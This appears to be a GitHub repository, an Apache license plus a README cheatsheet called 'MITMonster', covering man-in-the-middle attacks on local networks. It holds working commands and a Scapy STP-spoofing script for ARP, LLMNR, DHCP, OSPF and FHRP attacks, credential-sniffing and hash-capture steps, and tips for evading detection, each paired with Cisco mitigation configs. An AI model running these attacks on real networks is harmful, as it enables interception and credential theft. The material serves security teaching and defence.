├── LICENSE ├── README.md └── images ├── croc-in-the-middle-attacker-cable.jpg ├── croc-in-the-middle-connecting-to-twisted-pair.jpg ├── croc-in-the-middle-sniffing-traffic.jpg └── mitmonster-cover.png /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MITMonster 2 | 3 | A monster cheatsheet on MITM attacks (New version in WIP) 4 | 5 | ![](/images/mitmonster-cover.png) 6 | 7 | # Disclaimer 8 | 9 | All information contained in this repository is provided for educational and research purposes only. The author is not responsible for any harm caused by using this information. 10 | 11 | # Table of Contents 12 | * [Prologue](#Prologue) 13 | * [Croc in the Middle](#croc-in-the-middle-by-s0i37-l1) 14 | * [Link Layer Attacks](#link-layer-attacks-l2) 15 | * [ARP Cache Poisoning](#arp-cache-poisoning) 16 | * [LLMNR/NBT-NS/mDNS Poisoning](#llmnrnbt-nsmdns-poisoning) 17 | * [STP Root Spoofing](#stp-root-spoofing) 18 | * [DHCPv4 Spoofing](#dhcp-spoofing-version-4) 19 | * [DHCPv6 Spoofing](#dhcp-spoofing-version-6) 20 | * [Network Layer Attacks](#network-layer-attacks-l3) 21 | * [Evil Twin against Dynamic Routing](#evil-twin-against-dynamic-routing-ospf) 22 | * [FHRP Spoofing](#first-hop-redundancy-spoofing) 23 | 24 | # Prologue 25 | 26 | Only practical MITM attacks that have a tangible impact are collected here. No theoretical attacks, only working techniques. In order to conduct MITM cautiously, I'll provide some helpful tips below. 27 | 28 | ## TTL shift 29 | 30 | A +1 incremental TTL offset allows the attacker's IP address to be hidden from the victim's packet trace, reducing the risk of compromising the attacker's actions. This is done with a single rule in the mangle table. 31 | 32 | ```bash 33 | sudo iptables -t mangle -A PREROUTING -i ethX -j TTL --ttl-inc 1 34 | ``` 35 | 36 | ## Traffic forward 37 | 38 | One of the main rules of MITM is to allow routing on your host, otherwise there will be unintentional DoS, traffic from legitimate hosts will bump into your computer 39 | 40 | ```bash 41 | sudo sysctl -w net.ipv4.ip_forward=1 42 | sudo echo 0 | tee /proc/sys/net/ipv4/conf/*/send_redirects 43 | ``` 44 | 45 | ## Hardware 46 | 47 | Take care of the power of your hardware, it should be ready to handle the traffic of several dozen legitimate hosts. This applies to your interface as well. If you are going to spoof hosts with a gigabit interface and you have a 100 Mbytes/second connection, the network speed will suffer and collapse. Users will quickly notice that the network is freezing and call the sysadmins, and they (if they're not getting paid for nothing) will figure out what's wrong. So the pentest will no longer be a secret, and you will have to blush in front of the admins. 48 | 49 | Here are the recommended iron parameters: 50 | 51 | - 4 CPU cores; 52 | - 8 GB RAM; 53 | - network interface with full duplex, 1 Gbps or higher. It's good if you can connect an Ethernet adapter via the high-speed Thunderbolt 3/4 interface. 54 | 55 | However, you're likely to run up against the capabilities of the switch port you're connected to. If there's a 1Gbps link there, you can't go much higher than that. Be sure to keep an eye on network behavior. 56 | 57 | ## NAT 58 | 59 | One of the main rules of MITM is NAT configuration. Usually attackers make do with a single command: 60 | 61 | ```bash 62 | sudo iptables -t nat -A POSTROUTING -o ethX -j MASQUERADE 63 | ``` 64 | 65 | Without NAT configured, an attacker will not be able to see the second part of the traffic, which could potentially contain credentials. This is because of asymmetric routing - where traffic goes one way but comes back another. With masquerading, asymmetric routing does not prevent an attacker from seeing traffic going both ways. 66 | 67 | However, if for example there are Zabbix agents in the network and after MITM they will be behind your host - network connectivity between Zabbix server and agents may be broken. Be careful. There are some risks to having a NAT. 68 | 69 | ## FW 70 | 71 | Before conducting MITM, make sure that there are no interfering rules on the FW 72 | 73 | ```bash 74 | sudo iptables -L 75 | sudo iptables -t nat -L 76 | sudo iptables -t mangle -L 77 | sudo iptables -t raw -L 78 | ``` 79 | 80 | ## NAT helper 81 | 82 | FTP, H.323 and SIP traffic can pass through you. These are No NAT Friendly protocols and you need the `nf_conntrack` module to make them work with NAT. With MITM, the attacker must enable NAT to see traffic going both ways. 83 | 84 | ```bash 85 | sudo modprobe nf_conntrack 86 | ``` 87 | 88 | ## Subnet mask length 89 | 90 | When doing ARP spoofing, do not spoof too large subnet masks, otherwise the load on your CPU will be higher than it can handle, which will cause the network to hang. 91 | 92 | ## Credentials sniffing 93 | 94 | A classic of the genre is to use [Dsniff](https://github.com/hackerschoice/dsniff) or [Pcredz](https://github.com/lgandx/PCredz) or [net-creds](https://github.com/DanMcInerney/net-creds) to identify credentials and other sensitive information in traffic 95 | 96 | ```bash 97 | sudo dsniff -i ethX -v 98 | sudo python3 ./Pcredz -i ethX -v 99 | sudo python2 net-creds.py -i ethX 100 | ``` 101 | 102 | # Croc-in-the-middle by s0i37 (L1) 103 | 104 | ## Theory 105 | 106 | Security researcher Andrey Zhukov, under the alias [s0i37](https://t.me/s0i37) , released an article about intercepting traffic with special "crocs" he uses to interfere with Ethernet wiring. This is how one-way MITM occurs. 107 | 108 | ![Attacker cable](/images/croc-in-the-middle-attacker-cable.jpg) 109 | 110 | ![Connecting to twisted pair](/images/croc-in-the-middle-connecting-to-twisted-pair.jpg) 111 | 112 | ![Traffic sniffing](/images/croc-in-the-middle-sniffing-traffic.jpg) 113 | 114 | ## Links 115 | 116 | Article link: https://hackmag.com/security/croc-in-the-middle/ 117 | 118 | A screen version of this article: https://youtu.be/AIyi98RBpzI 119 | 120 | # Link Layer Attacks (L2) 121 | 122 | ## ARP Cache Poisoning 123 | 124 | The most popular MITM attack, it is characterized by its simplicity. By sending IS-AT ARP frames, the attacker imposes his address as the default gateway address for the MITM attack. 125 | 126 | ### Attack Impact 127 | 128 | MITM 129 | 130 | ### Tools 131 | 132 | Use one of these tools to redirect traffic. 133 | 134 | #### [ARP-MITM](https://github.com/hackerschoice/thc-arpmitm) 135 | 136 | ``` 137 | sudo arpmitm -t 138 | ``` 139 | 140 | #### [Ettercap](https://github.com/Ettercap/ettercap) 141 | 142 | ``` 143 | sudo ettercap -G 144 | ``` 145 | 146 | ### Mitigations 147 | 148 | To prevent ARP Spoofing on your network, you need a combination of DHCP Snooping and Dynamic ARP Inspection. The presence of DHCP Snooping is mandatory and it is important that it is fully populated, without this table DAI will block all host network traffic, i.e. a shot in the foot! 149 | 150 | **Cisco IOS Example (DHCP Snooping):** 151 | 152 | Setting up DHCP Snooping is basically assigning trusted and untrusted ports. On untrusted ports, all DHCP messages will be monitored. The goal is to see if they are generated by the DHCP server. After all, if we see messages like `DHCPLEASEQUERY`, `DHCPOFFER` and `DHCPACK` on the user segment, it is definitely an anomaly and there is a DHCP server on the user network. 153 | 154 | On trusted ports, all DHCP messages will be considered legitimate. Typically, trusted ports are configured on connections between switches and routers, and untrusted ports are configured on ports where end stations (e.g., computer, printer, access points, VoIP) are connected. 155 | 156 | ``` 157 | Monster(config)# interface g0/2 158 | Monster(config)# ip dhcp-server 159 | Monster(config)# ip dhcp snooping 160 | Monster(config)# ip dhcp snooping vlan 161 | ``` 162 | 163 | If necessary, you can create a static entry in the DHCP Snooping database: 164 | 165 | ``` 166 | Monster(config)# ip dhcp snooping binding vlan interface expiry 167 | ``` 168 | 169 | Commands for debugging and checking DHCP Snooping: 170 | 171 | ``` 172 | Monster(config)# show ip dhcp snooping 173 | Monster(config)# show ip dhcp snooping statistics 174 | Monster(config)# show ip dhcp snooping binding 175 | ``` 176 | 177 | For reliability, it is necessary to write the contents of the DHCP Snooping table to the switch memory: if the switch suddenly goes into reboot and the DHCP Snooping table is lost. If this happens together with Dynamic ARP Inspection, we will get network paralysis: 178 | 179 | ``` 180 | Monster(config)# ip dhcp snooping database flash:/snooping.db 181 | ``` 182 | 183 | The Snooping database can be not only stored in the switch memory, but also transmitted via FTP, HTTP, RCP, SCP, TFTP services 184 | 185 | ``` 186 | Monster(config)# ip dhcp snooping database ? 187 | flash: 188 | ftp: 189 | https: 190 | rcp: 191 | scp: 192 | tftp: 193 | timeout: 194 | write-delay 195 | ``` 196 | 197 | **Cisco IOS Example (Dynamic ARP Inspection):** 198 | 199 | DAI allows you to prevent ARP spoofing within the network by tracking all ARP traffic. And there is a very important point here. In order for inspection to work, it needs to be based on something, and all of its work is directly dependent on DHCP Snooping. DAI based on the DHCP Snooping table will check the validity of ARP responses, that is, to see if the MAC address and IP address are actually bound within the network. If not, DAI will instantly block such traffic. 200 | 201 | DAI configuration relies on the same concept of trusted and untrusted ports. As with DHCP Snooping, all switch ports are untrusted by default. Otherwise, it's the same: trusted ports are ports between switches and routers, untrusted ports are user ports. On untrusted ports, you should enable IP Source Guard (IPSG), which will check the source of requests. 202 | 203 | ``` 204 | Monster(config)# int g0/2 205 | Monster(config-if)# ip arp inspection trust 206 | Monster(config)# interface range f0/1-24 207 | Monster(config-if-range)# ip verify source 208 | ``` 209 | 210 | If necessary, you can create an ARP ACL to avoid checking devices with a static IP. In case there are hosts on your network with a static address. 211 | 212 | ``` 213 | Monster(config-if)# arp access-list DAI 214 | Monster(config-arp-nacl)# permit ip host mac host 215 | ``` 216 | 217 | After finishing the configuration and making sure that the required static addresses are assigned and the DHCP Snooping table is fully saturated, we enable DAI itself. DAI, like DHCP Snooping, is enabled on VLAN segments 218 | 219 | ``` 220 | Monster(config)# ip arp inspection vlan 221 | ``` 222 | 223 | ## LLMNR/NBT-NS/mDNS Poisoning 224 | 225 | A common attack against Windows networks. The attacker responds to all queries of these protocols and gives its address when the computer searches for the target host name. 226 | 227 | ### Attack Impact 228 | 229 | Credentials Interception against Windows hosts 230 | 231 | ### Tools 232 | 233 | [Responder](https://github.com/lgandx/Responder) 234 | 235 | ```bash 236 | sudo responder -I ethX -vv 237 | ``` 238 | 239 | ### Mitigations 240 | 241 | Disabling the LLMNR and NBT-NS protocols. But disabling MDNS is more complicated, as it is used for printers, macOS, Chromecast. However, attacks on mDNS can be monitored at the IDS level. There is a risk of network disruption if MDNS traffic is restricted. 242 | 243 | ## STP Root Spoofing 244 | 245 | The essence of this attack is to hijack the role of the root switch by injecting the BPDU frame with the lowest priority value. However, this will only result in a partial MITM attack. 246 | 247 | ### Attack Impact 248 | 249 | Partial MITM 250 | 251 | ### Tools 252 | 253 | Scapy 254 | 255 | ```python 256 | from scapy.all import * 257 | 258 | INTERFACE = "eth0" 259 | ATTACKER_MAC = "00:11:22:33:44:55" 260 | STP_MCAST = "01:80:C2:00:00:00" 261 | 262 | def spoof(): 263 | frame = Dot3(src=ATTACKER_MAC, dst=STP_MCAST) 264 | llc_layer = LLC(dsap=0x042, ssap=0x042, ctrl=3) 265 | mal_bpdu = STP(rootmac=ATTACKER_MAC, bpduflags=0x01, bridgemac=ATTACKER_MAC) 266 | mal_stp_bpdu = frame / llc_layer / mal_bpdu 267 | print("[!] Beginning of root switch role hijacking. . .") 268 | sendp(mal_stp_bpdu, iface=INTERFACE, inter=2, loop=1, verbose=1) 269 | 270 | spoof() 271 | ``` 272 | 273 | ### Mitigations 274 | 275 | Enabling BPDU Guard will block the port from which the BPDU frame will be sent, which is how an attacker hijacks the role of the root switch. 276 | 277 | **Cisco IOS Example:** 278 | 279 | ```bash 280 | Monster(config)# interface range f0/1-24 281 | Monster(config-if-range)# spanning-tree bpduguard enable 282 | ``` 283 | 284 | ## DHCP Spoofing (Version 4) 285 | 286 | The attacker raises a false DHCP server on his host to impose his address as the default gateway address for clients receiving the address automatically. This results in a MITM attack. 287 | 288 | When attacking a DHCP server, keep track of the DHCP Lease Time timer, which indicates when the client's dynamic address is leased. This is one of the parameters of your bogus DHCP server. If your attack time is less than the DHCP Lease timer, it could lead to an unintended DoS. Clients will still think their gateway is you, but you have already shut down the DHCP server. This will make MITM no longer a secret and you will attract unnecessary attention from network administrators. 289 | Properly calculate this timer and the time during which spoofing will occur. Also calculate the size of the address space so that your hardware can handle forwarding traffic from legitimate hosts. (based on the capabilities of your hardware) 290 | 291 | ### Attack Impact 292 | 293 | MITM 294 | 295 | ### Tools 296 | 297 | [Yersinia](https://github.com/tomac/yersinia) 298 | 299 | ``` 300 | sudo yersinia -G 301 | ``` 302 | 303 | ### Mitigations 304 | 305 | DHCP Snooping is required to protect against this attack. In "Link Layer Attacks -> ARP Cache Poisoning -> Mitigations" you will find the necessary information and commands. 306 | 307 | ## DHCP Spoofing (Version 6) 308 | 309 | mitm6 is one of the most popular tools among pentesters. Its concept is to respond to DHCPv6 requests (via DHCPv6 ADVERTISE) from Windows machines, causing legitimate Windows machines to think of the attacker as a DNS server at the IPv6 level. 310 | MITM6 can be blocked using VMAPs against UDP port 547, which is used by a DHCPv6 server inside the segment. Obviously, such a server inside the segment is an anomaly. This is an alternative way to deal with this tool, although there is already a fairly popular method is to simply turn off IPv6, but this arrangement will not work for every infrastructure. Also RA GUARD may be suitable as an alternative, but it is not available in all network devices. 311 | 312 | With this attack, the attacker imposes his address as the address of a DNS server at the IPv6 level 313 | 314 | ### Attack Impact 315 | 316 | MITM 317 | 318 | ### Tools 319 | 320 | [mitm6](https://github.com/dirkjanm/mitm6) 321 | 322 | ```bash 323 | mitm6 -h 324 | ``` 325 | 326 | ### Mitigations 327 | 328 | RA Guard, Filtering via VMAP's, Disabling IPv6 on a Windows network when it is not in use 329 | 330 | **Filtering via VMAP's Example (Cisco IOS):** 331 | 332 | The method is experimental, you have to be careful with it. 333 | 334 | ``` 335 | Monster(config)# ipv6 access-list MITM6 336 | Monster(config-ext-acl)# permit udp any eq 547 any 337 | 338 | Monster(config)# vlan access-map BLOCKMITM6 seq 10 339 | Monster(config-vlan-map)# match ipv6 address MITM6 340 | Monster(config-vlan-map)# action drop log 341 | Monster(config)# vlan access-map BLOCKMITM6 seq 20 342 | Monster(config-vlan-map)# action forward 343 | 344 | Monster(config)# vlan filter BLOCKMITM6 vlan-list 345 | ``` 346 | 347 | The switch will now filter DHCPv6 messages and will not allow mitm6 traffic in a `UDP/547` context. This will prevent an attacker from imposing itself as a DNS server at the IPv6 layer. 348 | 349 | ### Links 350 | 351 | Article Link: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ 352 | 353 | # Network Layer Attacks (L3) 354 | 355 | ## Evil Twin against Dynamic Routing (OSPF) 356 | 357 | ### The problem of MITM attacks against dynamic routing 358 | 359 | Performing a MITM attack against dynamic routing is **IMPOSSIBLE** because route injection against a host on another segment creates a routing loop. 360 | However, I have found an Evil Twin attack vector where you can **IMPERSONATE** the target host 361 | 362 | ### Mechanics 363 | 364 | An attacker would use the [FRRouting](https://frrouting.org/) virtual router to interfere with dynamic routing 365 | 366 | The main idea of this attack is to redistribute a static route with the lowest metric into an OSPF network. This network will be used as a vector for false route injection. FRR makes it possible to operate with static routing and its redistribution, which releases me from the need to use discrete utilities (Loki, Scapy, etc) 367 | 368 | Suppose you want to spoof an SMB service under the address `10.1.1.33/32`, you need to configure such a route and distribute it across the network using redistribution. In this example, the target dynamic routing would be OSPF. 369 | 370 | **Setting up an OSPF network, the attacker declares his address to connect in OSPF and specifies a zone** 371 | 372 | ``` 373 | monster# conf ter 374 | monster(config)# router ospf 375 | monster(config-router) network 192.168.31.2/32 area 0.0.0.0 376 | monster(config-router) redistribute static metric 0 377 | ``` 378 | 379 | Another factor is route cost. Using FRR, I am going to specify a zero-cost static route redistribution. The lower is this metric, the more preferable is the route. And since I specify the `/32` mask during the injection, the chance that the injected route will be added to the routing table is very high. This is because the packet received by the router will go to the network with the largest mask (in the `10.1.1.33/32 via 192.168.31.2` route format) 380 | 381 | **Injection structure:** 382 | 383 | ``` 384 | monster(config)# ip route 10.1.1.33/32 ethX 385 | ``` 386 | 387 | Now I have to create a secondary address on the network interface equal to the address of the target SMB share since the traffic will come to my host via destination ip `10.1.1.1.33/32` 388 | 389 | ```bash 390 | sudo ifconfig ethX:1 10.1.1.33 netmask 255.255.255.255 391 | ``` 392 | 393 | Now all traffic intended for this SMB share will go to my host. After that, I can deploy a simple SMB server using [impacket](https://github.com/fortra/impacket) and intercept encrypted user credentials (i.e. NetNTLM hashes) that can be subsequently brute-forced or relayed (NTLM Relay) 394 | 395 | ```bash 396 | sudo impacket-smbserver -smb2support sharePath /home/caster/smb-share 397 | ~/toolkit/net-creds$ sudo python2 net-creds.py -i ethX 398 | ``` 399 | 400 | Exercise caution when you interfere in the routing process! The above-described attack is extremely aggressive: when users go to some SMB share for their files, they won’t find nothing there. Since you’re spoofing this share, you might be able to deploy a copy of it. You will collect enough hashes pretty soon, and then you can stop the attack. It’s not recommended to procrastinate the exploitation; otherwise, legitimate employees would become upset, while your covert pentesting study won’t be a secret anymore. 401 | 402 | Due to the high convergence rate in OSPF, once your injected route is deadvertised, the routing table structure will quickly return to its initial (i.e. before the attack) state. The convergence rate is four seconds. However, everything depends on the network size since all routers must update their tables. Again, exercise caution! 403 | 404 | ``` 405 | monster(config)# no ip route 192.168.100.1/32 ethX 406 | ``` 407 | 408 | ### Attack Impact 409 | 410 | Evil Twin 411 | 412 | ### Mitigations 413 | 414 | Use passive interfaces, cryptographic authentication. This will prevent an attacker from interfering with the dynamic routing process and introducing false routes 415 | 416 | **Passive Interfaces Configuration (Cisco IOS)** 417 | 418 | ``` 419 | Monster(config)# router ospf X 420 | Monster(config-if)# passive-interface GigabitEthernet X/X 421 | ``` 422 | 423 | **OSPF Cryptographic Authentication (Cisco IOS)** 424 | 425 | ``` 426 | Monster(config)# interface GigabitEthernet X/X 427 | Monster(config-if)# ip ospf authentication message-digest 428 | Monster(config-if)# ip ospf message-digest-key md5 429 | ``` 430 | 431 | ### Links 432 | 433 | Caster - [Nightmare Spoofing](https://hackmag.com/security/ospf-evil-twin/) 434 | 435 | ## First Hop Redundancy Spoofing 436 | 437 | First Hop Redundancy Protocol (FHRP) is a class of protocols ensuring network gateway redundancy. The idea is to combine multiple physical routers into one logical router with a common IP address. This address of the virtual router will be assigned to the interface of the master router responsible for traffic forwarding. The most popular protocols in the FHRP class are HSRP and VRRP. 438 | 439 | The attack occurs by stealing the Master role from the FHRP router, thus the attacker performs a MITM attack and wraps the traffic of the entire segment onto itself, a very audacious attack. This is done by injecting the FHRP packet with the highest priority value. 440 | 441 | ### Attack Impact 442 | 443 | MITM 444 | 445 | ### Tools 446 | 447 | [Loki](https://github.com/Raizo62/Loki_on_Kali) 448 | 449 | ### Mitigations 450 | 451 | Authentication, Highest Priority. 452 | 453 | Authentication will prevent illegitimate routers from entering the fault tolerance process. If an engineer intends to protect FHRP in this manner, a strong passphrase is required. 454 | 455 | **Example of MD5 authentication for HSRP:** 456 | 457 | ``` 458 | Monster(config-if)# standby X authentication md5 key-string 459 | ``` 460 | 461 | **Example of MD5 authentication for VRRP:** 462 | 463 | ``` 464 | Monster(config-if)# vrrp X authentication md5 key-string 465 | ``` 466 | 467 | For security reasons, it is recommended to set the maximum priority on the Master or Active router. That way, if an attacker sends a malicious packet with a priority of 255, he will not be able to become the "master" because he already has one. 468 | 469 | However, this will not work for VRRP because the maximum priority that can be set is 254. Therefore, it would make more sense to use either authentication or even ACL-based filtering. 470 | 471 | Example of setting the maximum priority for HSRP: 472 | 473 | ``` 474 | Monster(config)# int g0/0 475 | Monster(config-if)# standby 1 priority 255 476 | ``` 477 | -------------------------------------------------------------------------------- /images/croc-in-the-middle-attacker-cable.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casterbyte/MITMonster/6cea1c01eaaffcfd2ae88f3b3d771505b5acedda/images/croc-in-the-middle-attacker-cable.jpg -------------------------------------------------------------------------------- /images/croc-in-the-middle-connecting-to-twisted-pair.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casterbyte/MITMonster/6cea1c01eaaffcfd2ae88f3b3d771505b5acedda/images/croc-in-the-middle-connecting-to-twisted-pair.jpg -------------------------------------------------------------------------------- /images/croc-in-the-middle-sniffing-traffic.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casterbyte/MITMonster/6cea1c01eaaffcfd2ae88f3b3d771505b5acedda/images/croc-in-the-middle-sniffing-traffic.jpg -------------------------------------------------------------------------------- /images/mitmonster-cover.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/casterbyte/MITMonster/6cea1c01eaaffcfd2ae88f3b3d771505b5acedda/images/mitmonster-cover.png --------------------------------------------------------------------------------